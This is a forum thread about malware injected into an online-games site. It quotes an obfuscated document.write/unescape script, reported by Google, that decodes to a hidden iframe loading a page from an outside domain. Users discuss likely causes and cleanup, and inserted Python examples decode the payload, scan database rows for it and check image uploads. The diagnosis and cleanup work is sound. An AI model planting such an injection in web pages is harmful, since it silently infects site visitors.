
Thread: aarrghh...... got malware on my ats site.

  1. #1 ZyPhiX:

    got this message today from google:

    Code:
    Dear site owner or webmaster of nowgamez.com,
    
    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
    
    Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
    
    http://nowgamez .com/
    http://www.nowgamez .com/
    
    Here is a link to a sample warning page:
    http://www.google.com/interstitial?url=http%3A//nowgamez.com/
    
    We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
    
    1) the site was compromised
    2) the site doesn't monitor for malicious user-contributed content
    3) the site displays content from an ad network that has a malicious advertiser
    
    If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
    http://www.stopbadware.org/home/security
     
    
    Once you've secured your site, you can request that the warning be removed by visiting
    http://www.google.com/support/webmasters/bin/answer.py?answer=45432
    and requesting a review. If your site is no longer harmful to users, we will remove the warning.
    
    Sincerely,
    Google Search Quality Team
    
    Note: if you have an account in Google's Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.

    In the webmasters it showed this:
    Code:
    Malware
    « Go back
    
    URL: http://www.nowgamez.com/
    
    Last checked: September 12, 2010
    
    Suspected injected code     Instances
    <script>document.write(unescape('%3C%73%70%61%6E%20%73%74%79
    %6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E
    %3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F
    %77%77%77%2E%67%75%6F%75%6F%2E%63%6F%6D%2F%69%6D%67%2F%2E%6E
    %65%65%64%65%64%2F%65%6E%74%2E%70%68%70%22%3E%3C%2F%69%66%72
    %61%6D%65%3E%3C%2F%73%70%61%6E%3E'));</script>

    If I check this link:
    http://www.google.com/safebrowsing/d...w.nowgamez.com

    it says:
    Code:
    What happened when Google visited this site?
    
        Of the 5 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-12, and the last time suspicious content was found on this site was on 2010-09-12.
    
        Malicious software is hosted on 1 domain(s), including guouo.com/.
    
        This site was hosted on 1 network(s) including AS21844 (THEPLANET).

    The Google fetch bot says success (in Webmaster Tools).


    Any ideas what caused it or what to check? I've already checked all files for this code, but nothing found....

    damn....

  2. #2 RickyG:

    That sucks!

    I have been seeing this more lately... must be a new wave of hackers out there.

  3. #3 brendgard:

    Pull up the page in a computer you don't care whether it gets infected or not, and look for that code on the finished page, not just the script code files. That could give you a better idea of which file needs closer inspection.

    1) You might not be looking for something that even looks like that. It could be something included or embedded from another site, like a Flash file might be.
    2) It could be advertising. We've seen banner exchanges and ad networks have this problem before. Check out all the banner exchanges shown on your site, and all the ad networks, by opening them each up in a window and refreshing several times to see if anything pops up.
    3) It could be something along the lines of the hacker stored that code in a database entry somewhere, instead of a file.

    Again, if you pull it up and check the finished page rather than the code files, it might offer a better clue as to where to find it in a case like this.

    If you find something, let us all know so we can be on guard.

  4. #4 Stephan:

    You know your site is very popular? You still send hits to my SFG; looks like some of your users don't care about the warning.

    Strange is, yesterday your other site showed a banner exchange (gamerflux.com) which is blocked, and now this site is infected!?

    Can this affect more sites on one server?

  5. #5 ZyPhiX:

    Just a quick update: I've found where it was inserted.

    It was inserted in the database, in the configuration table, in the field "seoText". The code was there at the end, exactly like I quoted before....


    Have to find out more... will keep you updated.
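    The obfuscated snippet Google reported in post #1, decoded and then searched for in a database dump the way posts #3 and #5 describe (check what the page actually emits, and check table fields, not just files). This is an added example written for this page, not code from the thread or from the ATS script; the payload string and the guouo.com domain are taken from the Webmaster Tools report quoted above, the sample rows are constructed, and the "hidden frame" heuristic (display:none, visibility:hidden, zero size near the iframe) is an assumption about what such injections tend to look like:

```python
import re
from urllib.parse import unquote, urlsplit

# The obfuscated script exactly as Google Webmaster Tools reported it in post #1
# (reflowed onto one string; nothing else changed).
REPORTED_PAYLOAD = (
    "<script>document.write(unescape('%3C%73%70%61%6E%20%73%74%79"
    "%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E"
    "%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F"
    "%77%77%77%2E%67%75%6F%75%6F%2E%63%6F%6D%2F%69%6D%67%2F%2E%6E"
    "%65%65%64%65%64%2F%65%6E%74%2E%70%68%70%22%3E%3C%2F%69%66%72"
    "%61%6D%65%3E%3C%2F%73%70%61%6E%3E'));</script>"
)

# unescape('...') literals carrying %XX escapes. JavaScript's unescape() turns %XX
# into that character, which is what urllib.parse.unquote does for the ASCII range.
UNESCAPE_RE = re.compile(r"unescape\(\s*'([^']*)'\s*\)", re.IGNORECASE)
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
# Styles and attributes commonly used to keep an injected frame out of sight (assumed heuristic).
HIDDEN_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*=\s*[\"']?0\b",
    re.IGNORECASE,
)


def decode_unescape_blobs(text):
    """Return the decoded string of every unescape('%XX...') literal found in text."""
    return [unquote(m.group(1)) for m in UNESCAPE_RE.finditer(text)]


def find_hidden_iframes(text):
    """Scan text and its decoded unescape() blobs for iframes.

    Returns a list of (src, hidden) tuples; hidden is True when a hiding style
    or a zero size appears within the 200 characters before the iframe tag.
    """
    findings = []
    for chunk in [text] + decode_unescape_blobs(text):
        for m in IFRAME_SRC_RE.finditer(chunk):
            context = chunk[max(0, m.start() - 200):m.end()]
            findings.append((m.group(1), bool(HIDDEN_RE.search(context))))
    return findings


def scan_rows(rows):
    """Run find_hidden_iframes over (table, field, value) rows, e.g. from a database dump.

    Each hit records where the frame sits and the host it loads, so the result
    can be compared with the domain the Safe Browsing diagnostic page named.
    """
    hits = []
    for table, field, value in rows:
        for src, hidden in find_hidden_iframes(value):
            hits.append({
                "table": table,
                "field": field,
                "src": src,
                "host": urlsplit(src).hostname,
                "hidden": hidden,
            })
    return hits


# Constructed sample rows (not a real dump): a seoText value with the reported
# payload appended at its end, as post #5 describes, next to a benign game embed.
SAMPLE_ROWS = [
    ("configuration", "siteName", "NowGamez"),
    ("configuration", "seoText", "Play free online games every day." + REPORTED_PAYLOAD),
    ("games", "description",
     'Shoot the asteroids. <iframe src="http://example.com/embed/asteroids"></iframe>'),
]

if __name__ == "__main__":
    print(decode_unescape_blobs(REPORTED_PAYLOAD)[0])
    for hit in scan_rows(SAMPLE_ROWS):
        print(hit)
```

    Run as a script it prints the decoded HTML (a display:none span wrapping an iframe to www.guouo.com) and two hits: the seoText row, flagged hidden and pointing at the host Safe Browsing named, and the game-description embed, reported but not hidden. The same scan can be pointed at the finished page's HTML, which is what post #3 recommends, since the raw files of the arcade never contained the string.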

  6. #6 brendgard:

    Depending on how the code is injected, yes. Usually though it only affects one site. Most times hackers don't gain enough access to look for other sites' files, and so move on to the next target. Many times it's not even in the site itself, but in something being included from another site such as a banner exchange code or advertising network's ads. If Gamer Flux was spitting out malware code through its iframe exchange code for instance, it would not be the arcade itself, but it would be reported as if from the arcade. And even if not from the arcade itself but through such a means as the iframe for an exchange like Gamer Flux, it could still infect user computers without needing to gain access to the arcade's own code. I'm not saying Gamer Flux is spitting out malware though, just using it for the example because you brought up that name.

  7. #7 Stephan:

    How does this work???
    Can somebody inject through a simple image? gif, png, jpg?

  8. #8 brendgard:

    Short answer: yes. Long answer: it's possible, especially on unpatched Windows boxes, but that is not what I'm referring to.

    They are not just simple graphics files, they are specially crafted files that are named with a .png, .jpg, or .gif extension. Usually it has scripting code for Windows to make it install itself on the target box, but with enough of the graphic file intact to actually show a pic so that the person does not know what has happened. Mickeysoft released a patch some time ago, but how many boxes are out there running an un-updated version? But again, this is not what was meant. This targets the visitor's computer, not the site itself.

    If a script allows uploads that are not checked, the hacker can also use that to upload a script file that adds something to files or the database. I've not heard of any scripts that allow for files to be uploaded without some sort of check on them. Most servers will not attempt to run a file with a .gif extension because it sees that extension as being only a graphic file, never an executable one. So even checking the file extension when uploading tends to weed that sort of nonsense out. Files named with extensions for images are mainly aimed at the visitor.

    No, when we talk about a banner exchange or ad network infecting a box, the offending site is usually adding in extra code to their regular exchange code base, or the advertiser is crafting their ads to do it, or Flash is involved. Most banner exchanges are coded to take in the member site's URL to credit their account with the impression/click, and then spit out a link back to themselves that leads to some other site. The link has a banner attached to it, and a URL with the info encoded into it. Some banner exchanges in the past have been hacked or have sold out, and extra code has been attached after this, code that installs the malware. We had one a while back that, in addition to serving up an impression for the member's site whose banner was being shown, also caused a couple of pop-unders to be served. Kinda ticked some people off that time. Or the member whose site is the one being served an impression that go round in the banner exchange's iframe might use an infected graphic, or a Flash file that redirects or installs malware. These are some of the reasons to stick with known good banner exchanges and ad networks. Come across a banner exchange that does not allow Flash banners? Might be a sign that they are trying to weed out bad banners rather than not be responsive to customers' wishes to use them. Flash banners have caused a lot of heartburn in the past.

    With it being found in the database, I seriously doubt that a banner exchange or ad network did this. They normally go after the visitor.
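    brendgard's point about upload scripts that check nothing, turned into an added example (my own Python, not ATS code and not anything posted in the thread). It assumes a PHP site that stores uploaded images, with the web server separately configured not to execute anything in the upload directory; the signatures are the standard PNG/GIF/JPEG leading bytes, and every sample blob below is constructed. It shows the three checks a defender wants: allowed extension, content matching that extension, and no script marker hidden behind an intact image header.

```python
import os
import secrets

# Leading bytes (file signatures) of the image types an upload form would accept.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# Byte sequences that have no business inside an image a PHP site will store.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def check_upload(filename, data):
    """Decide whether an uploaded file may be stored as an image.

    Returns (ok, reason). The file passes only when its extension is on the
    allow-list, its first bytes match that type's signature, and no script
    marker appears anywhere in its content (a crafted "image" keeps enough of
    the real header to display, so the header check alone is not sufficient).
    """
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        return False, "extension not allowed: " + (ext or "(none)")
    if not data.startswith(MAGIC[ext]):  # bytes.startswith accepts a tuple of prefixes
        return False, "content does not match the " + ext + " signature"
    lowered = data.lower()  # only ASCII letters are folded, which is all the markers use
    for marker in SCRIPT_MARKERS:
        if marker in lowered:
            return False, "script marker found: " + marker.decode()
    return True, "ok"


def storage_name(filename):
    """Server-chosen name for an accepted file: a random token plus the checked extension.

    Discarding the client's filename neutralises double-extension names such as
    name.php.gif, which some server configurations would otherwise treat as PHP.
    """
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(8) + ext


# Constructed samples (not real uploads).
GOOD_GIF = b"GIF89a" + bytes(32)                                     # plain GIF header plus padding
GIF_WITH_PHP = b"GIF89a" + bytes(8) + b"<?php echo 'marker'; ?>"     # image header intact, script appended
FAKE_PNG = b"<script>/* constructed */</script>"                     # script content under an image name
WRONG_TYPE = b"\x89PNG\r\n\x1a\n" + bytes(16)                         # PNG bytes uploaded as .jpg

if __name__ == "__main__":
    samples = [("banner.gif", GOOD_GIF), ("banner.php.gif", GIF_WITH_PHP),
               ("ad.png", FAKE_PNG), ("photo.jpg", WRONG_TYPE), ("game.swf", b"FWS")]
    for name, blob in samples:
        ok, reason = check_upload(name, blob)
        print(name, ok, reason, storage_name(name) if ok else "")
```

    The extension check on its own is what brendgard describes most scripts doing; the signature and marker checks are what catch a file that is an image to the extension test but a script to whatever eventually opens it. Renaming on storage is the cheap complement to that, because it means the name the attacker chose is never what the web server sees.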

  9. #9 RickyG:

    DB = hacker

  10. #10 ZyPhiX:

    Since it was inserted in the SEO text field in the configuration table.... it can be done using the admin panel or straight into the DB, but I don't assume that last option; that is too hard to find, then you would choose other tables or even more databases....

    But anyway, I changed all the files and checked the DB. Changed my HostGator password, FTP password, database login for ATS and the admin account itself. And now I'm reinstalling Windows too :-)

    I'm glad I also have a laptop; boring to see Windows 7 installing :P
